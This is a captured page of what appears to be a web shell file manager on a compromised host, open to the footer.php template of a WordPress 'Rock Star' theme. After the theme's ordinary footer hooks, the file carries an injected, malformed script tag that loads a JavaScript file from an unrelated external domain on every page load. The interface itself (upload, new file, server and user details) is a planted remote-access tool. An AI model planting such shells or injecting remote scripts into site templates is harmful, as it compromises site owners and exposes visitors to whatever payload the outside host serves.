Dashboard
PHP:
8.0.30
OS:
Linux
User:
hoozgot
/
/
home
/
hoozgot
/
www
/
theroadhogs
/
wp-content
/
themes
/
rock-star
📤 Upload
📝 New File
📁 New Folder
Close
Editing: footer.php
<?php /** * The template for displaying the footer * * @package Catch Themes * @subpackage Rock Star * @since Rock Star 0.3 */ /** * rock_star_after_content hook * * @hooked rock_star_content_end - 10 * @hooked rock_star_after_content_sidebar - 20 * */ do_action( 'rock_star_after_content' ); /** * rock_star_footer hook * * @hooked rock_star_footer_content_start - 10 * @hooked rock_star_footer_sidebar - 20 * @hooked rock_star_footer_menu - 50 * @hooked rock_star_mobile_footer_nav_anchor - 60 * @hooked rock_star_get_footer_content - 100 * @hooked rock_star_footer_content_end - 110 * @hooked rock_star_site_inner_end - 190 * @hooked rock_star_page_end - 200 * */ do_action( 'rock_star_footer' ); /** * rock_star_after hook * * @hooked rock_star_scrollup - 10 * */ do_action( 'rock_star_after' ); wp_footer(); ?> <script async src="https://<script async src="https://cdn.claritydelivr.com/smpackage.js"></script>"></script> </body> </html>
Save
Cancel